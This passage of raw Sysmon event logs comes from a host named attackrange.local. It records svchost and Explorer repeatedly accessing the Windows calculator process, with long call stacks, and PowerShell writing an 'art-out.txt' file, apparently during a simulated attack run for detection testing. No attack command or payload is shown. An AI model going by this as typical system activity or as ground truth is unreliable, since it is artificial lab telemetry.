indows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 11241100x8000000000000000361734Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:13:27.803 10341000x8000000000000000361733Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361732Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361731Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361730Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361729Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361728Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361727Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361726Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14387|C:\Windows\System32\CapabilityAccessManagerClient.dll+15172|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361725Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361724Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361723Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361722Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361721Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361720Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361719Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361718Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361717Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000361716Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361715Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361714Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361713Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361712Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f